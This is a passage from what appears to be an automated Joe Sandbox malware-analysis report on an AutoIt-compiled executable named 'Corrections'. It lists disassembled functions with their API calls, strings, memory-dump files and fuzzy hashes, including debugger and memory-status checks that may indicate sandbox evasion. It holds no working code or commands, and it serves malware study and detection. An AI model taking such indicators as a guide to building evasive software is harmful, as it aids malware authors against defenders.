Instruction Fuzzy Hash: 0A91BD75A01604DFDB15DF58C4C4EAABBF5AF48304F1A8099E84A9F362C731EE85CB90

Function 0094E5ED Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 0094E67D

Strings

pow, xrefs: 0094E655, 0094E672

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 33fa7f68a03baa81e0879465782eaf5d3098794389dcd8267b02aae6fdbc7d7f
Instruction ID: 446b7dd48ca641ef045a949e7991afec2bf52ae2accfe70eb0c44e2799a7076d
Opcode Fuzzy Hash: 33fa7f68a03baa81e0879465782eaf5d3098794389dcd8267b02aae6fdbc7d7f
Instruction Fuzzy Hash: 37519F71E1C50186D711F725DD01BBB2BA8BB50752F308D58F8D5522E8EF398C89AB46

Function 0093A8EC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON

Download Yara Rule

Strings

#, xrefs: 0093A916

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: 796fdaa4ae8d2f4018ec843f99d58ee3ca4ef431aba78a97dc4d9e8b1991098f
Instruction ID: d9e4ec1dc1fd63e1eec030171f521b2a49992157d8d2c05a679c3be26e4a80eb
Opcode Fuzzy Hash: 796fdaa4ae8d2f4018ec843f99d58ee3ca4ef431aba78a97dc4d9e8b1991098f
Instruction Fuzzy Hash: 33516432544246DFCB25DF28C449BBB7BA8EF55320F248055F895AB2E0DB749D82CB61

Function 0093F6CA Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 0093F6DB
GlobalMemoryStatusEx.KERNEL32(?), ref: 0093F6F4

Strings

@, xrefs: 0093F6E8

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: 4ec5ce38f92a7174435400a518257b660647deecd3269921c02b1c707fd26953
Instruction ID: 0f624749464bb48bf701f42fc4578758291cc49e1bf6e8119611f52004246623
Opcode Fuzzy Hash: 4ec5ce38f92a7174435400a518257b660647deecd3269921c02b1c707fd26953
Instruction Fuzzy Hash: 585148B14197589BD320AF10EC86BABBBF8FBD4300F81885DF1D9411A5DF308569CB66

Function 009A61A2 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?), ref: 009A623D
_wcslen.LIBCMT ref: 009A6249

Strings

CALLARGARRAY, xrefs: 009A6243, 009A6248

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: BuffCharUpper_wcslen
String ID: CALLARGARRAY
API String ID: 157775604-1150593374
Opcode ID: 61348d70a9d31fe409887199a516ddb678ce506392332b457716847c4024b1c4
Instruction ID: b5d45be14516dd4234de3ce705d7386019714b0f4fe465501159790794acd119
Opcode Fuzzy Hash: 61348d70a9d31fe409887199a516ddb678ce506392332b457716847c4024b1c4
Instruction Fuzzy Hash: BB419E71A00215DFCB04EFA8C885AEEBBB5FF99364F144029E815E7251E771AD81CB90

Function 0099DB39 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0099DB75
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 0099DB7F

Strings

|, xrefs: 0099DB50

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: CrackInternet_wcslen
String ID: |
API String ID: 596671847-2343686810
Opcode ID: fa7de1dc8bc4e6a6cb72b681b518d21d5655850957f23b3ad449676c3900ea8b
Instruction ID: 42cd0f70742e96e97ec5c6c5ca9038253f68fdf2bbc97cd636b3b59e703e7860
Opcode Fuzzy Hash: fa7de1dc8bc4e6a6cb72b681b518d21d5655850957f23b3ad449676c3900ea8b
Instruction Fuzzy Hash: 97317071C02119ABCF05EFA4DC85EEEBFB9FF48304F104025F815A6166EB759906CB60

Function 009B4008 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 009B40BD
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 009B40F8

Strings

static, xrefs: 009B4058

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: 9efa41b379923017a4f288121595d5670f263370c5a05b2c9a4ce7103d813833
Instruction ID: ffa542197e5cb082d2853ecf290d6fa16e16e41f2bd17af317ca5e006b62b19f
Opcode Fuzzy Hash: 9efa41b379923017a4f288121595d5670f263370c5a05b2c9a4ce7103d813833
Instruction Fuzzy Hash: C531A171110604AADB10DF78CC80FFB77ADFF88724F008619F99597191DA71AC81DB60

Function 009B4FD5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000027,00001132,00000000,?), ref: 009B50BD
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 009B50D2

Strings

', xrefs: 009B502C

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: 058a3230f9a46a3b4ad6f0a7c3e22a2a5ed3e5550f8d27688cccf74e249ffa4c
Instruction ID: b36e5ac2aecd1d6906af233255fd925d83cf4ab41d5cbc84e8be359697b5745e
Opcode Fuzzy Hash: 058a3230f9a46a3b4ad6f0a7c3e22a2a5ed3e5550f8d27688cccf74e249ffa4c
Instruction Fuzzy Hash: 3F314A74A0170A9FDB14DFA9CA80BEE7BB9FF49310F11406AE908AB351D771A945CF90

Function 009B3C8B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 009B3D18
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 009B3D23

Strings

Combobox, xrefs: 009B3CE5

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 5cd6cde1d07cd745912413b30b264cd140c2384f682caeb744706a7c3b1f36ad
Instruction ID: 6c4ed1aa079e9c7ab9f6130e93879abd632db1192e85d534b1d78a78fdc1c4d8
Opcode Fuzzy Hash: 5cd6cde1d07cd745912413b30b264cd140c2384f682caeb744706a7c3b1f36ad
Instruction Fuzzy Hash: 281190716102086FEF11DFA4DD81FEB3B6EEB883B4F108124F919A7290DA719D5197A0

Function 009B41AC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00927873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 009278B1
Part of subcall function 00927873: GetStockObject.GDI32(00000011), ref: 009278C5
Part of subcall function 00927873: SendMessageW.USER32(00000000,00000030,00000000), ref: 009278CF

GetWindowRect.USER32(00000000,?), ref: 009B4216
GetSysColor.USER32(00000012), ref: 009B4230

Strings

static, xrefs: 009B41F3

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: 19e70b4eb639c0abb4190d5e17ac07d39772732daf669c88131cadb167a9d7da
Instruction ID: 72154119dbb74c8cd045372f39340db40c82ac6955000425a149b2280a948c30
Opcode Fuzzy Hash: 19e70b4eb639c0abb4190d5e17ac07d39772732daf669c88131cadb167a9d7da
Instruction Fuzzy Hash: A2112672610209AFDB00DFA8CD45AFA7BA8EF08324F014928F965E3251E674E851EB60

Function 0099D763 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0099D7C2
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 0099D7EB

Strings

<local>, xrefs: 0099D7AB

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: 838c15835548148ee5666b135b9b565f926188271e3b1ebd96cfd2f2f59cde21
Instruction ID: 9a370e7c7f8e3293b77fb9519bbac32ad647deb7d3f8f13a93b365020c2bbeb7
Opcode Fuzzy Hash: 838c15835548148ee5666b135b9b565f926188271e3b1ebd96cfd2f2f59cde21
Instruction Fuzzy Hash: 6E11E9B11172327ADB344BEA8CC9EF7BE5DEB127A4F10422AF50993180D6689940D6F0

Function 009875ED Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 0092B329: _wcslen.LIBCMT ref: 0092B333

CharUpperBuffW.USER32(?,?,?), ref: 0098761D
_wcslen.LIBCMT ref: 00987629

Strings

STOP, xrefs: 00987623, 00987628

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: STOP
API String ID: 1256254125-2411985666
Opcode ID: 34fb7e55b42e7d0ad88e7a22dcb5b6a22d6659feca76486c08e13398ada39997
Instruction ID: 1f417a5238799759f04413bd30ccd4f47bf0b3988113e584d18daa3bd2860ba8
Opcode Fuzzy Hash: 34fb7e55b42e7d0ad88e7a22dcb5b6a22d6659feca76486c08e13398ada39997
Instruction Fuzzy Hash: FA01C432A149269BCB20BEFDDC44ABFB3B9AB607907600A24E42592395FB35DD40D751

Function 0098262B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0092B329: _wcslen.LIBCMT ref: 0092B333

Part of subcall function 009845FD: GetClassNameW.USER32(?,?,000000FF), ref: 00984620

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00982699

Strings

ComboBox, xrefs: 00982638
ListBox, xrefs: 00982663

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: c5f163e56a24d56b7b0e03d6178d60dcb995a57323397cdfc804f0f9f45e6577
Instruction ID: 180874ba6d3cb900bcf806dc217fefede9bcda8a1a7ec8f66ad2742cea7533f8
Opcode Fuzzy Hash: c5f163e56a24d56b7b0e03d6178d60dcb995a57323397cdfc804f0f9f45e6577
Instruction Fuzzy Hash: 7301D475645225ABCB04FBA4CC51DFE77A8EFD6360B040A1AB833973C5EA315808C750

Function 00982525 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0092B329: _wcslen.LIBCMT ref: 0092B333

Part of subcall function 009845FD: GetClassNameW.USER32(?,?,000000FF), ref: 00984620

SendMessageW.USER32(?,00000180,00000000,?), ref: 00982593

Strings

ComboBox, xrefs: 00982532
ListBox, xrefs: 0098255D

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: ecf6f71c67a68baa5f69e341b4019ddbb57cf2ed82583ca0dd9bee5d5b729c56
Instruction ID: 24579a33861e75cd520aa74126917b3137de34e43766c3e3bc68a7287d42aba0
Opcode Fuzzy Hash: ecf6f71c67a68baa5f69e341b4019ddbb57cf2ed82583ca0dd9bee5d5b729c56
Instruction Fuzzy Hash: 9C01A2B6A81115ABCB05F7A0D962EFF77E8DF95380F540029B903A73C5DA109E0897B1

Function 009825A9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0092B329: _wcslen.LIBCMT ref: 0092B333

Part of subcall function 009845FD: GetClassNameW.USER32(?,?,000000FF), ref: 00984620

SendMessageW.USER32(?,00000182,?,00000000), ref: 00982615

Strings

ComboBox, xrefs: 009825B6
ListBox, xrefs: 009825E1

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 9c2e3ef297404be72085657de5bd323ddbfb48c55bfdf930245d46fcfdb9cbf0
Instruction ID: 6930756376b871fc8e5b1f2460e475e92516d3f11928a6e9d9750be99b95a19f
Opcode Fuzzy Hash: 9c2e3ef297404be72085657de5bd323ddbfb48c55bfdf930245d46fcfdb9cbf0
Instruction Fuzzy Hash: 8701ADB6A45115ABCB05F7A0D942FFE77A8DF95380F54002AB802A3385EA619E0897B1

Function 009826B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0092B329: _wcslen.LIBCMT ref: 0092B333

Part of subcall function 009845FD: GetClassNameW.USER32(?,?,000000FF), ref: 00984620

SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00982720

Strings

ComboBox, xrefs: 009826C2
ListBox, xrefs: 009826ED

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 564957a67aa498a8bcf15dff0388bf28ab7c9a9e3016e2877041862fc039b611
Instruction ID: 60f52aa3d04684138c964658749b3671a13c0e29b7659d6336de5baea6243665
Opcode Fuzzy Hash: 564957a67aa498a8bcf15dff0388bf28ab7c9a9e3016e2877041862fc039b611
Instruction Fuzzy Hash: 61F028B5A41224A7CB05F3A49C41FFE73ACEF81390F440919B422A33C5DB606C0CC360

Function 00981461 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 0098146F

Strings

AutoIt, xrefs: 00981463
Error allocating memory., xrefs: 00981468

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: Message
String ID: AutoIt$Error allocating memory.
API String ID: 2030045667-4017498283
Opcode ID: bcdb562da8d3af28e7802a885e5afbba59d0147b2988a7e78f0c50e432f0f856
Instruction ID: 90398c315cc5215c3f061c3213c64b7cf37572b6d6c1a8ff5fb91167da6fcfb2
Opcode Fuzzy Hash: bcdb562da8d3af28e7802a885e5afbba59d0147b2988a7e78f0c50e432f0f856
Instruction Fuzzy Hash: F1E0D83224D31437D2243794BC03FC976888F89B65F11442AF788A54C39EF224504399

Function 009410B3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 0093FAD4: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,009410E2,?,?,?,0092100A), ref: 0093FAD9

IsDebuggerPresent.KERNEL32(?,?,?,0092100A), ref: 009410E6
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0092100A), ref: 009410F5

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 009410F0

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 55579361-631824599
Opcode ID: cc12650a3bcef5fe404ea52a8aed296e9bfedae4650dfbd997ac4cd7657eb344
Instruction ID: 08fdda1b564bc12e2b22766baf5d88039c409488fd832d61612839c7f0af5472
Opcode Fuzzy Hash: cc12650a3bcef5fe404ea52a8aed296e9bfedae4650dfbd997ac4cd7657eb344
Instruction Fuzzy Hash: D0E09270A083508BD3309F24E904B02BFE4AF44708F008D2CE895C3651EBB4D484CF91

Function 009939D8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?,00000001), ref: 009939F0
GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00993A05

Strings

aut, xrefs: 009939F9

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: ca7a257fc2aaf124863bea9feea7fcef3e488fd47ee5ddeec1d87063e70287a3
Instruction ID: 1748f522e4d2ae125acd295944431037ee7323c1832b082425b9258a0acec1e7
Opcode Fuzzy Hash: ca7a257fc2aaf124863bea9feea7fcef3e488fd47ee5ddeec1d87063e70287a3
Instruction Fuzzy Hash: AED05E7250536867DA20A7A59D0EFCB7A6CDB44720F0002A5BB6592095EAB0DA85CB90

Function 009B2DBE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 009B2DC8
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 009B2DDB

Part of subcall function 0098F292: Sleep.KERNEL32 ref: 0098F30A

Strings

Shell_TrayWnd, xrefs: 009B2DC1

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

